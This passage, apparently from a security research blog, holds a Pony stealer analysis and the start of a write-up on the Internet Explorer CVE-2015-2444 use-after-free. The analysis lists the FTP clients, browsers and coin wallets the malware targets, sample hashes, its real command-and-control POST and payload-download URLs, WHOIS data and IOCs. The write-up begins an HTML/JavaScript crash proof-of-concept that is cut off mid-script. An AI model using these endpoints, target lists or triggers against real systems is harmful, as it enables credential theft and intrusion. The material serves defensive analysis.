<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">PPCoin (Peercoin)</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SecureFX</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">AceFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Primecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">UltraFXP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Global Downloader</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Feathercoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTPRush</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FreshFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NovaCoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WebSitePublisher</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">BlazeFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Freicoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">BitKinex</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NETFile</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Devcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ExpanDrive</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">GoFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Frankocoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ClassicFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">3D-FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ProtoShares</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fling</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Easy FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MegaCoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SoftX</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Xftp</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Quarkcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Directory Opus</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Now</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Worldcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FreeFTP / DirectFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Robo-FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Infinitecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">LeapFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">LinasFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ixcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WinSCP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Cyberduck</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Anoncoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">32bit FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Putty</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">BBQcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NetDrive</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Notepad + +</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Digitalcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WebDrive</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CoffeeCup Visual Site Designer</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Mincoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Control</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTPShell</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Goldcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Opera</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTPInfo</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Yacoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WiseFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NexusFile</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Zetacoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Voyager</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FastStone Browser</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fastcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Firefox</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CoolNovo</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">I0coin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FireFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WinZip</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Tagcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SeaMonkey</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Yandex.Internet / Ya.Browser</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bytecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Flock</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MyFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Florincoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Mozilla</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">sherrod FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Phoenixcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">LeechFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NovaFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Luckycoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Odin Secure FTP Expert</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Windows Mail</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Craftcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WinFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Windows Live Mail</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Junkcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Surfer</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Becky!</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><br /></td>
</tr>
</tbody>
</table>
</div>
It copies itself into the system by using an integer filename, which is executed though a chain of ShellExecuteEx<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth3.png" /></div>
<div style="text-align: center;">
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 98px;"></col>
<col style="width: 706px;"></col></colgroup>
<tbody valign="top">
<tr>
<td style="border: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE NAME</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">31780534.exe</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE SIZE</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">317440 bytes</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE TYPE</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MD5</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2bd7a3cc81ae70b16b2a85008fb7dd81</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA1</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">7bf35f051a44dc31f0b138e1874e1d75745d49b3</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA256</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">57e38fcc3a641896f351f4bdd7308d7b38b2e9981a8fc7ea5512dfcd8935d856</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CRC32</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">4AA8F5BD</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SSDEEP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">6144:D9mlPaljn+AGwnc6AAech5ppsx7K05mtq1pTOw7/Cr:xm5aZ+MpemzpsdK0m+N7M</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">YARA</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">None matched</span></td>
</tr>
</tbody>
</table>
</div>
Not only does pony steal information, but it also downloads other malware, which are hardcoded in the binary itself<br />
<div style="text-align: center;">
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 328px;"></col>
<col style="width: 474px;"></col></colgroup>
<tbody valign="top">
<tr>
<td colspan="2" style="border: 0.5pt solid; padding-left: 9px; padding-right: 9px; text-align: left;"><span style="font-size: 10pt;">http://titratresfi.ru/gate.php</span></td>
<td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; padding-left: 9px; padding-right: 9px; text-align: left;"><span style="font-size: 10pt;">POST /gate.php HTTP/1.0<br />
</span><span style="font-size: 10pt;">Host: titratresfi.ru<br />
</span><span style="font-size: 10pt;">Accept: */*<br />
</span><span style="font-size: 10pt;">Accept-Encoding: identity, *;q=0<br />
</span>
<span style="font-size: 10pt;">Accept-Language: en-US<br />
</span><br />
<span style="font-size: 10pt;">Content-Length: 270<br />
</span><br />
<span style="font-size: 10pt;">Content-Type: application/octet-stream<br />
</span><br />
<span style="font-size: 10pt;">Connection: close<br />
</span><br />
<span style="font-size: 10pt;">Content-Encoding: binary<br />
</span><br />
<span style="font-size: 10pt;">User-Agent: Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR
3.0.04506.648; .NET CLR 3.5.21022)<br />
</span></td>
</tr>
<tr>
<td colspan="2" style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; padding-left: 9px; padding-right: 9px; text-align: left;"><span style="font-size: 10pt;">http://adishma.com/media/system/shost.exe</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">GET /media/system/shost.exe HTTP/1.0<br />
</span>
<div style="text-align: left;">
<span style="font-size: 10pt;">Host: adishma.com<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">Accept-Language: en-US<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">Accept: */*<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">Accept-Encoding: identity, *;q=0<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">Connection: close<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">User-Agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET
CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)</span></div>
</td>
</tr>
</tbody>
</table>
</div>
Now let’s look at the network traffic it has generated.<br />
<div style="text-align: center;">
</div>
It sends basic information to the command and control server, which we are going to examine deeply in the second post.<br />
Network information<br />
domain: TITRATRESFI.RU<br />
nserver: ns1.entrydns.net.<br />
nserver: ns2.entrydns.net.<br />
state: REGISTERED, DELEGATED, VERIFIED<br />
person: Private Person<br />
registrar: R01-RU<br />
admin-contact: https://partner.r01.ru/contact_admin.khtml<br />
created: 2015.11.09<br />
paid-till: 2016.11.09<br />
free-date: 2016.12.10<br />
source: TCI<br />
Last updated on 2015.11.15 16:16:33 MSK<br />
Domain Name: ADISHMA.COM<br />
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br />
Sponsoring Registrar IANA ID: 303<br />
Whois Server: whois.PublicDomainRegistry.com<br />
Referral URL: http://www.PublicDomainRegistry.com<br />
Name Server: NS1.SOFTONETECHNOLOGIES.COM<br />
Name Server: NS2.SOFTONETECHNOLOGIES.COM<br />
Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited<br />
Updated Date: 07-sep-2015<br />
Creation Date: 26-dec-2014<br />
Expiration Date: 26-dec-2015<br />
IOC<br />
<Indicator id=”aae1b2d0-a5ad-471a-8c48-2296f6cfb49e” operator=”OR”><br />
<IndicatorItem condition=”is” id=”b1984833-80fe-446b-a3d8-3349822f6336″><br />
<Context document=”FileItem” search=”FileItem/Md5sum” type=”mir”/><br />
<Content type=”md5″>6245899b11a6bd6769b3656943322d13</Content><br />
</IndicatorItem><br />
<IndicatorItem condition=”is” id=”e2168e97-5db8-4432-b498-8a5973deeb42″><br />
<Context document=”FileItem” search=”FileItem/Sha1sum” type=”mir”/><br />
<Content type=”sha1″>9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content><br />
</IndicatorItem><br />
<IndicatorItem condition=”is” id=”f66fb3f0-1178-4638-bf06-24d131cfd2c7″><br />
<Context document=”FileItem” search=”FileItem/Sha256sum” type=”mir”/><br />
<Content type=”sha256″>15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content><br />
</IndicatorItem><br />
<Indicator id=”81c75ab7-69b2-434d-808f-607a5b283cec” operator=”AND”><br />
<IndicatorItem condition=”is” id=”bb45ed4b-823c-41d0-8831-0ab41c874a7f”><br />
<Context document=”FileItem” search=”FileItem/FileName” type=”mir”/><br />
<Content type=”string”>Centrylink</Content><br />
</IndicatorItem><br />
<IndicatorItem condition=”is” id=”9194b695-6af4-428f-b2cf-3a40c2560e78″><br />
<Context document=”FileItem” search=”FileItem/SizeInBytes” type=”mir”/><br />
<Content type=”int”>209408</Content><br />
</IndicatorItem><br />
<IndicatorItem condition=”is” id=”010608b2-0016-426d-9dce-2e9ad855f786″><br />
<Context document=”FileItem” search=”FileItem/PEInfo/PETimeStamp” type=”mir”/><br />
<Content type=”date”>2015-11-12T09:49:00Z</Content><br />
</IndicatorItem><br />
</Indicator><br />
Using VT we are able to map other files which are using the same location for downloading other malware.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth5.png" /></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth4.png" /></div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-619916641139647632015-12-31T14:31:00.000+05:302015-12-31T14:31:19.660+05:30Internet Explorer remote memory-corruption vulnerability CVE-2015-2444<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="margin-left: 36pt;">
<strong> </strong></div>
<div class="separator" style="clear: both; text-align: center;">
<strong><a href="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQ5cHYM7YscvdoYZPULmd5HpBvLGCcjo_SYzcPLysc4gGoq4ShwZA" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQ5cHYM7YscvdoYZPULmd5HpBvLGCcjo_SYzcPLysc4gGoq4ShwZA" /></a></strong></div>
<strong><br /></strong><br />
<div style="margin-left: 36pt;">
<strong>Vulnerability</strong>: As per the <a href="https://www.symantec.com/security_response/vulnerability.jsp?bid=76194">Symantec</a> report,
Microsoft Internet Explorer is prone to a remote memory-corruption
vulnerability. Attackers can exploit this issue by enticing an
unsuspecting user to view a specially-crafted webpage. Attackers can
exploit this issue to execute arbitrary code in the context of the
currently logged-in user. Failed attacks will cause denial-of-service
conditions. Internet Explorer 8, 9, 10 and 11 are vulnerable.</div>
<div style="margin-left: 36pt;">
The following are details of the vulnerability report</div>
<div style="margin-left: 36pt;">
<strong>Vendor</strong>: Microsoft, http://www.microsoft.com</div>
<div style="margin-left: 36pt;">
<strong>Affected Products</strong>: Internet Explorer</div>
<div style="margin-left: 36pt;">
<strong>Affected Version</strong>: IE 8-11</div>
<div style="margin-left: 36pt;">
<strong>Vulnerability</strong>: CTreeNode::GetCascadedLang Use-After-Free</div>
<div style="margin-left: 36pt;">
<strong>CVE ID</strong>: CVE-2015-2444</div>
<div style="margin-left: 36pt;">
<strong>Details</strong>:</div>
<div style="margin-left: 36pt;">
Microsoft Internet Explorer is prone to
User-After-Free Vulnerability in the MSHTML!CTreeNode::GetCascadedLang
function. We will do a detailed analysis by windbg and IDA Pro</div>
<div style="margin-left: 36pt;">
Proof of Concept:</div>
<div style="margin-left: 36pt;">
The following html page causes crash and error</div>
<div style="margin-left: 36pt;">
<!DOCTYPE HTML></div>
<div style="margin-left: 36pt;">
<html></div>
<div style="margin-left: 36pt;">
<meta http-equiv=”X-UA-Compatible” content=”IE=10″ /></div>
<div style="margin-left: 36pt;">
<script></div>
<div style="margin-left: 36pt;">
function Trigger()</div>
<div style="margin-left: 36pt;">
{</div>
<div style="margin-left: 36pt;">
for(i=0; i < document.getElementsByTagName(“meter”).length; i++)</div>
<div style="margin-left: 36pt;">
{</div>
<div style="margin-left: 36pt;">
document.getElementsByTagName(“meter”)[i].innerText = “a”;</div>
<div style="margin-left: 36pt;">
}</div>
<div style="margin-left: 36pt;">
}</div>
<div style="margin-left: 36pt;">
function reload()</div>
<div style="margin-left: 36pt;">
{</div>
<div style="margin-left: 36pt;">
location.reload();</div>
<div style="margin-left: 36pt;">
